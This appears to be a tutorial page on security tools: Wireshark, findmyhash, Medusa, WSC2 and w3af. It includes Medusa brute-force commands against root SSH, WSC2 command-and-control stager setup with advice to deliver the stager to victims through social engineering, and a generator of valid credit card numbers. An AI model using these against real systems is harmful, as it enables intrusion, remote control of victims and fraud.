What is Wireshark?

Wireshark is the most widely used network protocol analyzer. It is free and open-source software released under the terms of the GNU General Public License (GPL), and it is mainly used for network troubleshooting, analysis, software and communications protocol development, and education. It shows its user what is happening on their network at a microscopic level. Many commercial and non-profit organizations, government agencies, and educational institutions use Wireshark.

History:

In 1998, Gerald Combs, a computer science graduate of the University of Missouri-Kansas City, started a project named Ethereal, which became the foundation of Wireshark. The project has carried the Wireshark name since 2006, when Combs started to work for CACE Technologies while holding the copyright to most of the project’s code; the rest of the code was open for modification under the terms of the GPL. Since then, volunteer contributions from network experts around the world have added to the project, making it as famous and widely used as it is nowadays.

Because Combs did not own the Ethereal trademark, he decided to rename the project Wireshark. In 2010, Riverbed Technology purchased CACE Technologies and became the main sponsor of Wireshark. There are several hundred contributors (around 600 authors) to this product; still, Combs remains primarily responsible for maintaining the overall code and releasing new versions of Wireshark.

Wireshark has won several awards for its vital role in today’s network security. eWeek named it the Most Important Open-Source App of All Time, it won the Editor’s Choice award from PC Magazine, and the Insecure.Org network security tools survey ranked it as a top packet sniffer.

The functionality of Wireshark:

Similar to tcpdump, a common packet analyzer, Wireshark allows us to analyze network packets, but with the aid of a graphical front-end and some extra integrated sorting and filtering options. If the Network Interface Controller (NIC) supports promiscuous mode, Wireshark puts it into that mode, usually in order to see all the traffic on the interface and not merely the traffic addressed to the interface’s configured addresses plus broadcast/multicast traffic.

However, a switch port does not necessarily receive all of the network’s traffic, so promiscuous mode on a port is not enough by itself. To capture the entire network’s traffic, other techniques such as port mirroring and network taps are used alongside promiscuous mode.

Wireshark 1.4 and later can put wireless network interface controllers into monitor mode. If a remote machine captures packets and sends them to Wireshark using the TZSP protocol or the protocol used by OmniPeek (another packet analyzer), Wireshark dissects those packets, so it can analyze packets captured on a remote machine at the time they are captured.

What features does Wireshark include?

In fact, Wireshark offers a large set of features. In the following points, I will attempt to summarize the features that Wireshark offers:

  • Wireshark is a network analyzer that inspects hundreds of protocols.
  • It allows both offline analysis and live captures.
  • It runs on diverse operating systems such as Microsoft Windows, Linux, macOS, Sun Solaris, and several other platforms.
  • A graphical user interface (GUI) built with the Qt widget toolkit lets us browse captured network data; in the non-GUI version, the TTY-mode TShark utility can be used for the same purpose.
  • It offers rich Voice over Internet Protocol (VoIP) analysis; we can even play back the media flow when decoding such captured traffic.
  • Wireshark uses pcap to capture packets.
  • Capture files compressed with gzip are supported and are decompressed on the fly.
  • Captured files can be programmatically edited or converted with the editcap program using its command-line switches.
  • It allows capturing raw Universal Serial Bus (USB) traffic.
  • Wireshark can capture packets from ns, OPNET Modeler, NetSim, and some other network simulation tools.
  • It supports reading and writing many capture file formats, such as tcpdump (libpcap), which is the native network trace file format, Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer, Sniffer Pro, NetXray, Network Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix k12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and several other formats.
  • It reads live data from many link types, such as Ethernet, IEEE 802.11, PPP/HDLC, ATM, loopback, Bluetooth, FDDI, and many others.
  • Decryption is supported for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2.
  • Coloring rules applied to the packet list allow quick and easy analysis. See the Color Coding section for further details.
  • Filters, timers, and other settings let us ensure that only traffic matching a trigger is analyzed.
  • Output can be exported to and formatted as XML, PostScript, CSV, or plain text.

Security Policies:

In general, no special security privileges are needed to run either Wireshark or TShark. Nowadays, only tcpdump or dumpcap, which is given special privileges, needs to run on the machine to capture traffic; the user needs no further privileges.

But how can a superuser grant the required privileges to a user? The answer lies in the fact that tcpdump or dumpcap, which come with Wireshark, must have the special privileges needed to capture packets into a file; that file can then be opened in Wireshark for analysis with severely restricted privileges. Even on wireless networks, the Aircrack wireless security tools can capture IEEE 802.11 frames, and the resulting tcpdump or dumpcap files can then be read by running Wireshark afterward.

Why do we need to restrict the privileges with which users run Wireshark and its tools? Basically because capturing traffic invokes an enormous number of protocol dissectors, which poses a real network security risk: a bug in one of those dissectors could be found and exploited, putting the whole system at risk. That is why running Ethereal/Wireshark in the past, when it required superuser privileges, meant that everything those privileges could reach was potentially affected.

Filtering Packets:

Sometimes we need to capture specific traffic, such as the packets a program sends when phoning home. On a network with a large number of captured packets, one would otherwise have to close all other applications using the network in order to isolate a specific type of traffic. This is where Wireshark’s filters come in. At the top of the window there is a filter box in which we simply type a filter name and then click Apply or, alternatively, press Enter. For instance, to see only DNS packets, we type “DNS” in the filter box. Wireshark auto-completes filter names as we type them in the filter box.

Color Coding:

The colors green, blue, and black distinguish the types of captured packets. Conventionally, green indicates Transmission Control Protocol (TCP) traffic. Dark blue is Domain Name System (DNS) traffic, whereas light blue indicates User Datagram Protocol (UDP) traffic. Black shows TCP packets with problems, such as being out of order.
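To make the filter box and the default colors concrete, here is an added example (not from the page or the Wireshark project) that writes a tiny libpcap capture of constructed Ethernet/IPv4 frames, reads it back, and applies single-protocol display filters and the simplified coloring described above; the addresses, ports, and the rule that DNS is recognised by port 53 are assumptions for this illustration.

```python
import struct
PCAP_MAGIC, LINKTYPE_ETHERNET = 0xA1B2C3D4, 1            # classic libpcap global-header values
COLOR = {"dns": "dark blue", "udp": "light blue", "tcp": "green"}   # coloring rules, simplified

def build_frame(proto, sport, dport, payload=b""):
    """Ethernet + IPv4 + UDP(17)/TCP(6) frame; constructed addresses, checksums left zero."""
    eth = bytes.fromhex("001122334455 66778899aabb 0800")
    if proto == 17:
        l4 = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    else:
        l4 = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0, 64, proto, 0,
                     bytes([192, 0, 2, 10]), bytes([192, 0, 2, 53]))
    return eth + ip + l4

def write_pcap(frames):
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)  # 24-byte header
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(f), len(f)) + f  # ts_sec, ts_usec, incl, orig
    return out

def read_pcap(data):
    """Parse the little-endian pcap layout produced by write_pcap and return the raw frames."""
    off, frames = 24, []
    while off < len(data):
        incl_len = struct.unpack_from("<I", data, off + 8)[0]
        frames.append(data[off + 16:off + 16 + incl_len])
        off += 16 + incl_len
    return frames

def dissect(frame):
    """Protocol layers a display filter ('ip', 'udp', 'dns', 'tcp') would match on this frame."""
    if frame[12:14] != b"\x08\x00":          # EtherType: only IPv4 is handled here
        return ["eth"]
    layers = ["eth", "ip"]
    ihl, proto = (frame[14] & 0x0F) * 4, frame[23]
    sport, dport = struct.unpack_from("!HH", frame, 14 + ihl)
    if proto == 17:
        layers += ["udp"] + (["dns"] if 53 in (sport, dport) else [])   # DNS by well-known port
    elif proto == 6:
        layers.append("tcp")
    return layers

def apply_filter(pcap_bytes, display_filter):
    return [f for f in read_pcap(pcap_bytes) if display_filter in dissect(f)]   # 'udp' also matches DNS

def color_of(frame):
    return next((COLOR[l] for l in reversed(dissect(frame)) if l in COLOR), "none")

SAMPLE_CAPTURE = write_pcap([build_frame(17, 40000, 53, b"\x12\x34\x01\x00"),
                             build_frame(6, 40001, 443), build_frame(17, 5000, 5001)])
```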

Findmyhash password cracking

Findmyhash helps you decipher some common hashes, and quickly; besides that, it is elementary to use, and you only need Python installed on your machine.

If you are passionate about deciphering passwords, this is a tool you should know. The first thing we must do is download the tool from the following link; this example is done from Linux.

https://code.google.com/archive/p/findmyhash/downloads

I recommend Linux Lite: it is very light and stable, it belongs to the Debian family, and its interface is very helpful.

After downloading the file, you just have to open a terminal in the folder where the .py file is located.

python findmyhash_v1.1.2.py MD5 -h "098f6bcd4621d373cade4e832627b4f6"

This will not take long, and the result is as follows.

python findmyhash_v1.1.2.py MD5 -h "25d55ad283aa400af464c76d713c07ad"

The result of the previous command line is as follows.

In the previous example we used MD5, as shown in the images, but below you have a list of all the algorithms you can test with.

Accepted algorithms are:

MD4 – RFC 1320
MD5 – RFC 1321
SHA1 – RFC 3174 (FIPS 180-3)
SHA224 – RFC 3874 (FIPS 180-3)
SHA256 – FIPS 180-3
SHA384 – FIPS 180-3
SHA512 – FIPS 180-3
RMD160 – RFC 2857
GOST – RFC 5831
WHIRLPOOL – ISO/IEC 10118-3:2004
LM – Microsoft Windows hash
NTLM – Microsoft Windows hash
MYSQL – MySQL 3, 4, 5 hash
CISCO7 – Cisco IOS type 7 encrypted passwords
JUNIPER – Juniper Networks $9$ encrypted passwords
LDAP_MD5 – MD5 Base64 encoded
LDAP_SHA1 – SHA1 Base64 encoded
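Before looking anything up, a practitioner first needs to know which of the formats above a string even is; this added example (not part of findmyhash or the page) identifies candidate algorithms from the list by shape alone and flags the ones that are reversible or trivially looked up, so an unknown digest found in a config dump can be triaged. The sample values in the test are constructed, and the shape rules for Cisco type 7, Juniper $9$, and the LDAP/MySQL prefixes are assumptions based on their documented formats.

```python
import re

# Shape rules derived from the algorithm list above. Plain hex digests are ambiguous
# (several algorithms share an output length), so those return every candidate;
# the prefixed formats are unambiguous.
HEX_LENGTH_CANDIDATES = {
    16: ["MYSQL (3.x)"],
    32: ["MD5", "MD4", "NTLM", "LM"],
    40: ["SHA1", "RMD160"],
    56: ["SHA224"],
    64: ["SHA256", "GOST"],
    96: ["SHA384"],
    128: ["SHA512", "WHIRLPOOL"],
}
PREFIXED = [
    (re.compile(r"\{MD5\}[A-Za-z0-9+/]{22}=="), "LDAP_MD5"),     # 16 raw bytes, base64
    (re.compile(r"\{SHA\}[A-Za-z0-9+/]{27}="), "LDAP_SHA1"),     # 20 raw bytes, base64
    (re.compile(r"\$9\$\S+"), "JUNIPER"),
    (re.compile(r"\*[0-9A-Fa-f]{40}"), "MYSQL (4.1+)"),
]
# Cisco type 7: two-digit seed 00..15 followed by an even number of hex digits.
CISCO7 = re.compile(r"(0[0-9]|1[0-5])(?:[0-9A-Fa-f]{2})+")

def identify_hash(value):
    """Return the candidate algorithms (from the list above) whose format matches the string."""
    value = value.strip()
    for pattern, name in PREFIXED:
        if pattern.fullmatch(value):
            return [name]
    candidates = []
    if re.fullmatch(r"[0-9A-Fa-f]+", value):
        candidates += HEX_LENGTH_CANDIDATES.get(len(value), [])
    if CISCO7.fullmatch(value):
        candidates.append("CISCO7")   # a 32-hex MD5 starting with 00..15 is also type-7 shaped
    return candidates

def weakest_candidates(value):
    """Candidates that are reversible obfuscation (type 7, $9$) or fast unsalted hashes
    that online lookups such as the one above resolve instantly (LM, MD4/MD5, NTLM, old MySQL)."""
    weak = {"CISCO7", "JUNIPER", "LM", "MD5", "MD4", "NTLM", "MYSQL (3.x)"}
    return sorted(weak & set(identify_hash(value)))
```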

I invite you to try this tool with other hashes and analyze the results; it can be useful if you need a very fast result.

If you are interested in learning more, we invite you to review this course.

Medusa

A brute force attack is a way to recover a key by trying all possible combinations until you find the one that allows access.

What is Medusa?

Medusa is one of the great tools for brute force. Based on word dictionaries, it is very stable, simple, and fast, and it supports attacks on many services.

Syntax

medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

How is it used?

Before cracking, we should establish whether the system is running an SSH service. Most probably SSH will be running on port 22, so this is the port that we will scan with Nmap. In a terminal, type:

nmap -sV -p 22 172.31.2.117

The -sV option is a service scan, while -p selects specific ports, in our case port 22. Other scans in nmap include the FIN scan and the SYN scan:

sudo -H nmap -sF -p 22 172.31.2.117

sudo -H nmap -sS -p 22 172.31.2.117

When you need to scan all the systems on the network, add /24 at the end of the IP. It should look like this:

nmap -sV -p 22 172.31.2.0/24

On determining that an SSH service is running on port 22, we can proceed to crack.

Medusa is an awesome online cracking tool, especially for cracking SSH, Telnet, and FTP services. If you have not installed Medusa, type in a terminal:

sudo -H apt-get install medusa

On installing, type:

medusa --help

Your screen should be similar to my screenshot:

medusa -h (host) -u (username) -P (wordlist) -M ssh

Medusa doesn’t include a pure brute-force mode that tries every possible password combination. Instead, it makes use of a wordlist. SecLists is a good set of wordlists that I’ve found on the internet. How fast Medusa will try to crack the password depends on how big your wordlist is as well as the quality of your internet connection. In my opinion, the root account is what you’d want to try and crack. There are several modules; however, since we are cracking the SSH password, the -M flag is set to ssh.
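From the defender's side, a wordlist attack against SSH like the one described above leaves a very recognisable trace in the server's auth log: many failed logins from one source in a short window, often cycling through usernames. This added example (not from the page or the Medusa project) runs a sliding-window detector over constructed OpenSSH auth.log lines; the log format, the threshold and window values, and the IP addresses are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample auth.log lines: one source fails repeatedly within seconds (root and a
# non-existent "admin" user), one legitimate user fails once and then succeeds.
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 host sshd[2231]: Failed password for root from 203.0.113.5 port 51234 ssh2
Mar  3 10:15:02 host sshd[2233]: Failed password for root from 203.0.113.5 port 51235 ssh2
Mar  3 10:15:02 host sshd[2235]: Failed password for invalid user admin from 203.0.113.5 port 51236 ssh2
Mar  3 10:15:03 host sshd[2237]: Failed password for root from 203.0.113.5 port 51237 ssh2
Mar  3 10:15:04 host sshd[2239]: Failed password for root from 203.0.113.5 port 51238 ssh2
Mar  3 10:15:05 host sshd[2241]: Failed password for root from 203.0.113.5 port 51239 ssh2
Mar  3 10:20:30 host sshd[2300]: Failed password for alice from 198.51.100.7 port 40001 ssh2
Mar  3 10:20:41 host sshd[2302]: Accepted password for alice from 198.51.100.7 port 40002 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)

def parse_failed_logins(text, year=2024):
    """Yield (timestamp, user, source_ip) for each failed login; syslog lines carry no year."""
    for line in text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["user"], m["ip"]

def detect_bruteforce(text, threshold=5, window_seconds=60):
    """Flag source IPs with >= threshold failures inside any window_seconds span.
    Returns {ip: {"failures": peak count in a window, "users": sorted usernames tried}}."""
    recent, users, flagged = defaultdict(deque), defaultdict(set), {}
    for ts, user, ip in parse_failed_logins(text):
        q = recent[ip]
        q.append(ts)
        users[ip].add(user)
        while (ts - q[0]).total_seconds() > window_seconds:   # drop failures outside the window
            q.popleft()
        if len(q) >= threshold:
            peak = max(len(q), flagged.get(ip, {}).get("failures", 0))
            flagged[ip] = {"failures": peak, "users": sorted(users[ip])}
    return flagged
```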

WSC2

Introduction

WSC2 is a PoC of using WebSockets and a browser process as a C2 communication channel between an agent, running on the target system, and a controller acting as the actual C2 server.

Installation

We clone the repository with the following command:

$ git clone https://github.com/Arno0x/WSC2.git

We enter the folder and list its contents:

$ cd WSC2/
$ ls

We install the requirements; remember that you should first create a virtual environment with virtualenv.

$ pip install -r requirements.txt

We modify the following file; you can do it with nano, but in this case we did it with vim. We edit the variable CALLBACK and set it to our IP, that is, the IP of the attacking machine.

$ vim config.py

Then we run the following command and press Enter.

$ ./wsc2.py

We are going to create a stager file. Many other stager options exist: this tool provides stagers in jscript1, jscript2, and jscript3. We are using jscript1 here because it does not need to be compiled; the rest of the stagers need to be compiled. This command creates a wsc2Agent1.js in the stagers directory.

$ genStager jscript1

We open a new terminal and go to the following location.

$ cd WSC2/

Then we enter the next folder and serve it over HTTP.

$ cd stagers/
$ python -m SimpleHTTPServer 80

This is what you would see when retrieving the file from another machine; you can also use social engineering to get this file to your victim.

Resources:

github.com/Arno0x/WSC2

W3af

We always want to be doing security tests, and we think we should create our own tools. Still, there are many things created by other people that can facilitate our checks; one of them is w3af.

What is w3af?

w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.

What can we do?

  1. Exploiting Web application vulnerabilities
  2. Scan REST APIs
  3. Web Application Payloads
  4. Metasploit integration

Installation

git clone https://github.com/andresriancho/w3af.git

cd w3af/
./w3af_console
./tmp/w3af_dependency_install.sh

How is it used?

Command to start the console:

./w3af_console

Like most tools you use from the terminal, it has a help command:

help

w3af contains a series of utilities that support the process of discovering and exploiting vulnerabilities; all of these utilities are located in <W3AF_DIR>/tools.

gencc

Generates valid credit card numbers:

cd tools
ls

./gencc -t mastercard

./gencc -t visa16

urldecode

Tries to decode a given URL; often used to turn URL-encoded text back into plain ASCII:

./urldecode -d http%3A%2F%2Flocalhost%2Fw3af

Resources:

docs.w3af.org
